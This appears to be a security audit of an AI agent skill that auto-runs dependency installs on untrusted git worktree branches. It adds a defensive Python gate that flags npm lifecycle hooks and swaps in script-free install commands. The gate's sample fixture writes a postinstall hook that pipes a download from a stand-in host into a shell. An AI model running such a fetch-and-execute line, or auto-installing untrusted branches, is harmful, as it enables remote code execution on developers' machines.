git-worktrees
Warn
Audited by Gen Agent Trust Hub on Apr 23, 2026
Risk Level: MEDIUM (REMOTE_CODE_EXECUTION, EXTERNAL_DOWNLOADS, COMMAND_EXECUTION)
Full Analysis
- [REMOTE_CODE_EXECUTION]: The 'How to Create Worktree' workflow instructs the agent to automatically detect and run dependency installation commands (such as npm install, pip install, bun install, etc.) immediately after checking out a branch into a new worktree. This can be exploited if a branch, particularly one from an external Pull Request, declares malicious scripts in configuration files like package.json (for example an npm lifecycle hook such as postinstall) that execute during installation.
- [EXTERNAL_DOWNLOADS]: The skill triggers automated downloads from public package registries including NPM, PyPI, and Cargo based on the contents of untrusted branches, without requiring prior human verification of the manifest files.
- [COMMAND_EXECUTION]: The skill executes shell commands for dependency management and project building (e.g., cargo build, composer install) chosen from the file structure of the checked-out branch, which is an unverified execution path for code from external sources.
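The gate below is an added example, not code from the audit or from the git-worktrees skill. It shows the check a practitioner would want in front of the auto-install step: detect the manifests the workflow would act on, report any package.json lifecycle hook that would run during a normal `npm install`, and, for a branch that is not trusted, substitute the install variants that do not execute repository-controlled code (`npm install --ignore-scripts`, `composer install --no-scripts --no-plugins`, `pip install --only-binary=:all:`, `cargo fetch` instead of `cargo build`). The manifest list, the hook names checked and the sample worktree it writes to a temporary directory are assumptions made for this example.

```python
"""Pre-install gate for a freshly checked-out worktree (added example)."""
import json
import os
import tempfile

# npm lifecycle hooks that execute automatically during a plain `npm install`.
NPM_INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# manifest -> (command the audited workflow would run, variant for an untrusted
# branch that does not execute repository-controlled code).
# The manifest list is an assumption for this example, not the skill's own.
MANIFESTS = {
    "package.json": ("npm install", "npm install --ignore-scripts"),
    "composer.json": ("composer install", "composer install --no-scripts --no-plugins"),
    "requirements.txt": ("pip install -r requirements.txt",
                         "pip install --only-binary=:all: -r requirements.txt"),
    # cargo fetch downloads crates without compiling, so build.rs never runs.
    "Cargo.toml": ("cargo build", "cargo fetch"),
}


def detect_manifests(worktree):
    """Manifests present at the worktree root, in a fixed order."""
    return [m for m in MANIFESTS if os.path.isfile(os.path.join(worktree, m))]


def npm_install_hooks(worktree):
    """{hook: command} for package.json scripts that run during `npm install`."""
    path = os.path.join(worktree, "package.json")
    if not os.path.isfile(path):
        return {}
    with open(path, encoding="utf-8") as fh:
        scripts = json.load(fh).get("scripts") or {}
    return {k: v for k, v in scripts.items() if k in NPM_INSTALL_HOOKS}


def plan_install(worktree, trusted=False):
    """Return (commands, findings) for the worktree.

    trusted=False models a branch from an external PR: each command is the
    variant that skips repository-declared code, and every npm lifecycle hook
    is reported so a human can review it before scripts are ever enabled.
    """
    commands, findings = [], []
    for hook, body in npm_install_hooks(worktree).items():
        findings.append(f"package.json scripts.{hook} runs on a plain npm install: {body!r}")
    for manifest in detect_manifests(worktree):
        normal, safe = MANIFESTS[manifest]
        commands.append(normal if trusted else safe)
    return commands, findings


def make_sample_worktree():
    """Write a constructed worktree with a malicious-looking postinstall hook."""
    root = tempfile.mkdtemp(prefix="wt-")
    pkg = {
        "name": "sample",
        "scripts": {"postinstall": "curl -s http://example.invalid/x | sh", "test": "jest"},
    }
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as fh:
        json.dump(pkg, fh)
    with open(os.path.join(root, "Cargo.toml"), "w", encoding="utf-8") as fh:
        fh.write('[package]\nname = "sample"\nversion = "0.1.0"\n')
    return root


def gate_sample(trusted=False):
    """Run the gate over the constructed worktree; returns (commands, findings)."""
    return plan_install(make_sample_worktree(), trusted)


if __name__ == "__main__":
    cmds, notes = gate_sample()
    print("\n".join(notes))
    print("\n".join(cmds))
```

For the constructed worktree the untrusted plan is `npm install --ignore-scripts` followed by `cargo fetch`, with one finding naming the postinstall hook; passing `trusted=True` yields the workflow's original `npm install` and `cargo build`. An agent workflow would run the findings past a human (or fail closed) before ever taking the trusted path.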
Audit Metadata